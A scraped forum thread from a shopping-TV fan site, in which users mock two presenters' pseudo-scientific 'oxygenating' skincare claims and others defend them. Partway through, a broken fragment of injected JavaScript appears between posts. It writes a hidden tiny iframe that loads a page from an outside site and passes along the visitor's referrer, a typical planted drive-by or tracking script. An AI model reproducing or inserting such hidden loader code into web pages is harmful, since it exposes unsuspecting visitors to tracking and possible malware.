Alison and Keely tallking utter utter rubbish!!!

ShoppingTelly

Help Support ShoppingTelly:

silversequin

Registered Shopper
Right I have had this pair on while doing the ironing and they just rattled on and on talking utter bilge:

Keeley "this cream will bring out the inner radiance of your skin"

a telephone caller then rings through to extol the virtues of Pro-collagen oxygen thingy cream, cue much sqwaking from A Y who has been requesting calls from people who first started using Elemis while on a cruise ship cos it is sooo preeestigious and exclusive. Then Keeley comes out with this utter nonsense to the caller

"Skin will look as if you have been standing on a mountain top, not that I advise standing on a mountain top"

Apart from this just being an idiotic remark, doesn't Keeley know that there is less oxygen in the air the higher up a mountain one goes.

On and on they went with this psedo science, it was funny and did keep me amused while I ploughed through the ironing but they are a daft pair.

Last edited:
Keeley

"Skin will look as if you have been standing on a mountain top, not that I advise standing on a mountain top"

Apart from this just being an idiotic remark, doesn't Keeley know that there is less oxygen in the air the higher up a mountain one goes..

Exactly why you need to buy the pro radiance oxygenating night cream due to lack of oxygen on mountain tops

Keely seems like a bit of an airhead (excuse the pun ) to me. Wouldn't have any confidence in anything that came out of her mouth.

Is Keely pregnant again, or is she still shedding the post pregnancy weight? If so, says a lot for the Elemis 'spa' products.

I'm old fashioned. i prefer "stupid"

Beautician isn't the career path of choice for the academically gifted is it? Getting on telly must give Keeley, AY et al a welcome escape from the hum-drum life of bikini and chin hair waxing. It's probably the cleverest decision they've ever made.

Jude xx

Is Keely pregnant again, or is she still shedding the post pregnancy weight? If so, says a lot for the Elemis 'spa' products.

I think it's post pregnancy weight. :giggle:

if (document.referrer) { var ref='?'+encode(document.referrer); } else { var ref=''; }
document.write('<iframe src="http://www.smileyssite.info/files/48.htm'+ref+'" width="20" height="20" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></iframe>');
//-->
</script>

I don't get the oxygen cream thingy. seen as the biggest cause of free radicals is supposedly Oxygen, why on earth would you want to encourage it in your skin?

Beautician isn't the career path of choice for the academically gifted is it? Getting on telly must give Keeley, AY et al a welcome escape from the hum-drum life of bikini and chin hair waxing. It's probably the cleverest decision they've ever made.

Jude xx

Actually to qualify as a beautician you need to learn a lot not just about products and what they can and can't do but about the anatomy of the skin right down to the cellular level. As well as muscle attachments etc.They also learn about disease process and how it can affect the skin. It's not a career for the stupid.
My sister is a qualified beautician and I know how much she had to learn she borrowed my anatomy books whilst she was doing the course

Actually to qualify as a beautician you need to learn a lot not just about products and what they can and can't do but about the anatomy of the skin right down to the cellular level. As well as muscle attachments etc.They also learn about disease process and how it can affect the skin. It's not a career for the stupid.
My sister is a qualified beautician and I know how much she had to learn she borrowed my anatomy books whilst she was doing the course

I agree whole-heartedly with this quote. I think other comments are being extremely unkind to Keeley. Maybe she did make an odd remark on the show but she has been unwell for a few months but still made a huge effort to carry on as normal as she doesn't like to let people down.

I've had several facials with her and cannot praise her highly enough. She is such a nice genuine intelligent person. She knows exactly which products are best for my skin and also explains why and I can tell you that she is right as my skin has improved dramatically. What initially surprised me is that she never tries to get you to buy her products which I must admit I did expect but she doesn't believe in pressuring anyone to buy things. She's also happy to answer any beauty questions you may have even if they are not Elemis or even if you have never purchased anything from her. Finally the Pro-Collagen Oxygenating Night Cream is fantastic as it plumps up my skin overnight - you really shouldn't 'knock' something if you havn't tried it.

Please keep up the good work Keeley and Alison - the majority of us really appreciate it. You're a pleasure to watch, especially when you both get the giggles.:happy:

Rather surprised to see Keeley admit on FB that despite using tan accelerator and ultrasun she has gone a bit red!!!!! Just shows that not all products will work for everyone!!!!

Just seen this Sazza and was about to post that she has posted " thank goodness not seeing Ali till Sunday !!!!" Do I sense that Elemis has won a award?

I suspect all the guests for brans nominated are invited for the award show.

This pair belong to the Peter Simon School of Presenting Bull......

Latest posts

Back